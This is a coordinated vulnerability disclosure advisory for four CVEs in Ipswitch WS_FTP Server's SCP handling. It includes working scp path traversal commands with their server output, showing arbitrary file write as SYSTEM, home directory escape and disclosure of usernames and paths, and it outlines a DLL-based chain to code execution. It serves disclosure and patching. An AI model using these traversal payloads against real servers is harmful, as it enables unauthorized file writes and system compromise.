Remote Code Execution and other Vulnerabilities in WS_FTP Server

Remote Code Execution and other Vulnerabilities in WS_FTP Server
September 18, 2019 6 mins

Remote Code Execution and other Vulnerabilities in WS_FTP Server

Remote Code Execution and other Vulnerabilities in WS_FTP Server

CVE-2019-12143, CVE-2019-12144, CVE-2019-12145, CVE-2019-12146: Multiple vulnerabilities in Ipswitch’s WS_FTP Server leading to arbitrary file write, remote code execution, and information disclosure.

Aon’s Cyber Solutions recently discovered multiple vulnerabilities in Ipswitch’s WS_FTP Server versions 8.6.0 and below.  The issues include:

  • An arbitrary file write as the SYSTEM user leading to remote code execution (CVE-2019-12144)
  • An arbitrary file write within a server’s FTP root (CVE-2019-12146)
  • Multiple information disclosure vulnerabilities (CVE-2019-12143, CVE-2019-12145)

These vulnerabilities all require valid user credentials and only affect the SCP protocol.

Aon would like to thank Ipswitch for working with Aon’s Cyber Labs under our coordinated disclosure process to quickly remediate these vulnerabilities.

Timeline:

04/05/19 – Vulnerabilities disclosed, receipt acknowledged
04/10/19 – Vulnerabilities confirmed
05/29/19 – Version 8.6.1 released containing fixes for all issues
09/18/19 – Aon public disclosure

Credits:

CVE-2019-12144 Dan Bastone
CVE-2019-12146 Devon Greene
CVE-2019-12143 Devon Greene
CVE-2019-12145 Dan Bastone

Vendor Advisory:

https://docs.ipswitch.com/WS_FTP_Server2018/ReleaseNotes/index.htm#49242.htm

CVE-2019-12144: Arbitrary File Write as SYSTEM via Path Traversal

Overview:

The WS_FTP server SCP listener does not adequately validate that supplied filenames do not contain path traversal characters. This allows an authenticated attacker to write files to arbitrary locations on the filesystem with SYSTEM permissions, even when the “Lock User To Home Directory” option is selected. This is demonstrated below by creating the file “c:\test.txt” using SCP, assuming that an attacker has valid credentials for “user1” and the WS_FTP server is listening on host 192.168.194.138.

Exploitation:
$ echo test > \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt
$ scp \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt [email protected]: [email protected]'s password:
\..\..\..\..\..\..\..\..\test.txt             100%    5     0.5KB/s   00:00

The file is present on the server:

C:\>dir /q test.txt
 Volume in drive C has no label.
 Volume Serial Number is F603-DB19
 Directory of C:\
04/03/2019  02:00 PM                   5 BUILTIN\Administrators test.txt
               1 File(s)               5 Bytes
               0 Dir(s)                49,050,906,624 bytes free
C:\>type test.txt
test

Note that the file is owned by an administrative user, demonstrating that this vulnerability allows files to be written anywhere on the filesystem.

This vulnerability can be further leveraged to obtain remote code execution as the SYSTEM user without requiring a reboot. By uploading a malicious DLL file, which is loaded by an IIS worker process used for the WS_FTP administrative interface approximately once every hour, we can obtain NETWORK SERVICE privilege. This level of privilege is sufficient to then add a new WS_FTP system administrator user which can create an FTP SITE command that is run as SYSTEM, resulting in code execution as the SYSTEM user. A fully working proof-of-concept has been developed and will be published at a later date.

CVE-2019-12146: Home Directory Escape via Path Traversal

Overview:

IPSwitch WS_FTP Server v8.6.0 contains a second path traversal vulnerability in the SCP Subsystem allowing authenticated attackers to write files and create directories outside of their home directory into the host’s FTP root. The issue stems from the application improperly resolving destination directories containing 3 or more dot (“.”) characters. This vulnerability exists in the parsing of the destination folder name and is distinct from CVE-2019-12144 above.

Exploitation:

The following commands create a test file and directory, and copies them to the vulnerable server:

$ touch test.txt
$ mkdir test
$ scp -r test.txt test/ [email protected]:.../

A directory listing on the server shows that the file and directory have been placed in the users/ directory, outside of the user’s home directory:

dir /q users/
...SNIP...
<DIR>      0 BUILTIN\Administrators test
           0 BUILTIN\ADMINISTRATORS test.txt

CVE-2019-12143: Username and Filename Disclosure via SCP Recursive Download

Authenticated users are able to discover usernames and filenames of other users using SCP recursive downloads along with path traversal and wildcard characters.  In the event a user does not have access to a file, a permission denied error followed by the file path is returned in the response.

Exploitation:

In this example, the system contains 3 users – user1, user2, and adminuser.  user1 is able to trigger error messages containing the other usernames along with filenames contained in their home directories.

$ scp -r [email protected]:../../*/*/* . 
[email protected]'s password:
scp:Permission Denied! /users/adminuser/admintestfile.txt
user1testfile.txt 100% 912 1.6MB/s
scp:Permission Denied! /users/user2/user2testfile.txt

CVE-2019-12145: Path Disclosure via Nonexistent Filenames

Overview:

By using filenames containing backslash characters in a manner similar to CVE-2019-12146, it is possible to cause the WS_FTP Server to return an error message that discloses the full pathname of the FTP root directory. This information may be useful to an attacker attempting to learn more about the filesystem layout to conduct further attacks.

Exploitation:

$ touch \\doesnt\\exist
$ scp \\doesnt\\exist [email protected]:
[email protected]'s password:
scp:Could not find a part of the path 'C:\Program Files (x86)\Ipswitch\WS_FTP Server\WS_FTP Server\[hostname redacted]\users\user1\doesnt\exist'.

Authors
  • Dan Bastone
  • Devon Greene

About Cyber Solutions:

Cyber security services are offered by Stroz Friedberg Inc., its subsidiaries and affiliates. Stroz Friedberg is part of Aon’s Cyber Solutions which offers holistic cyber risk management, unsurpassed investigative skills, and proprietary technologies to help clients uncover and quantify cyber risks, protect critical assets, and recover from cyber incidents.

General Disclaimer

This material has been prepared for informational purposes only and should not be relied on for any other purpose. You should consult with your own professional advisors or IT specialists before implementing any recommendation, following any of the steps or guidance provided herein. Although we endeavor to provide accurate and timely information and use sources that we consider reliable, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future.

Terms of Use

The contents herein may not be reproduced, reused, reprinted or redistributed without the expressed written consent of Aon, unless otherwise authorized by Aon. To use information contained herein, please write to our team.

More Like This

View All
Subscribe CTA Banner